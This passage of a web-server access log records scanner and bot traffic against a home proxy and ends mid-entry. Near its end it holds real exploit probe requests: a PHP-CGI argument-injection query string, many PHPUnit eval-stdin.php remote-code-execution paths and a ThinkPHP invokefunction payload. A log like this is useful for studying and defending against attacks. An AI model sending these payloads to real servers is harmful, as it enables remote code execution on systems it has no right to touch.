Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:00:26 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3" "-" +[28/Jan/2026:16:06:49 +0000] 400 - - http localhost "-" [Client 85.217.140.8] [Length 0] [Gzip -] "-" "-" +[28/Jan/2026:16:08:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:12:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 52.188.231.41] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:16:15:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.42.232.64] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:16:15:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:20:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:16:21:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 89.42.231.186] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:16:23:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:23:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 50.65.192.85] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[28/Jan/2026:16:23:18 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:44:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:51:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:16:55:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:17:05:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:11:08 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:11:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:15:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:20:55 +0000] 400 - GET http 91.82.215.191 "/" [Client 172.202.118.119] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:17:20:56 +0000] 400 - - http localhost "-" [Client 172.202.118.119] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:17:30:20 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 78.29.51.27] [Length 1033] [Gzip -] "IMPORTANT! FREE! NON-CRIMINAL BLOCKCHAIN PHP NEURAL NETWORK! OWN BLOCKCHAIN SCIENTIFIC DEBT GATEWAY! OWN HOSTING AND ENCRYPTED DATABASE! LINK - http://78.29.51.27/phpneuralnetwork/?s1=CU_profibot.direct.quickconnect.to" "http://78.29.51.27/phpneuralnetwork/?s1=CU_profibot.direct.quickconnect.to" +[28/Jan/2026:17:33:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.242.226.80] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[28/Jan/2026:17:34:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:35:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[28/Jan/2026:17:42:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:17:46:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:17:47:48 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:17:54:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:17:55:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:08:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:11:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:16:16 +0000] 400 - GET http 91.82.215.191 "/" [Client 85.217.140.1] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)" "-" +[28/Jan/2026:18:21:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:18:31:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:32:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:41:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.179] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:18:41:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.179] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:18:42:12 +0000] 404 - GET http 91.82.215.191 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:18:44:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:18:44:18 +0000] 404 - GET http 91.82.215.191 "/hudson" [Client 20.106.56.201] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:18:44:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:45:34 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:18:48:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 54.173.243.192] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[28/Jan/2026:19:06:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 20.65.154.237] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:19:17:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:19:18:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:19:21:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[28/Jan/2026:19:21:52 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/sqlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/sqlitemanager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/SQLite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager-1.2.4/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:21:53 +0000] 404 - GET http 91.82.215.191 "/agSearch/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[28/Jan/2026:19:34:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:19:41:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:19:48:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.58] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:19:48:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 162.142.125.32] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:19:48:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.32] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:19:48:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.32] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:19:48:55 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:19:49:24 +0000] 404 - GET http 91.82.215.191 "/wiki" [Client 162.142.125.32] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:19:49:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.32] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:19:52:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:19:52:50 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:20:08:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 34.34.132.221] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[28/Jan/2026:20:14:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:20:16:27 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:20:17:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.27] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:20:17:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.27] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:20:20:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.253.200.157] [Length 1033] [Gzip -] "-" "-" +[28/Jan/2026:20:21:34 +0000] 400 - GET http 91.82.215.191 "/" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:21:35 +0000] 400 - - http localhost "-" [Client 150.107.38.251] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:20:21:36 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:21:38 +0000] 400 - GET http 91.82.215.191 "/robots.txt" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:21:40 +0000] 400 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:21:40 +0000] 400 - GET http 91.82.215.191 "/sitemap.xml" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:21:41 +0000] 400 - GET http 91.82.215.191 "/llms.txt" [Client 150.107.38.251] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:20:24:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:20:30:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:20:37:29 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 93.158.91.33] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A415F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3" "-" +[28/Jan/2026:20:51:48 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 60.22.27.17] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:20:51:48 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 60.22.27.17] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:20:51:49 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:49 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 60.22.27.17] [Length 154] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:50 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:51 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:51 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:52 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:53 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:53 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:54 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:55 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:55 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:56 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:57 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:57 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:58 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:58 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:59 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:51:59 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:00 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:00 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:01 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:02 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:03 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:04 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:04 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:05 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:05 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:06 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:06 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:07 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:07 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:08 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:08 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:09 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:09 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:10 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:10 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:10 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:11 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:12 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 60.22.27.17] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:20:52:12 +0000] 404 - GET 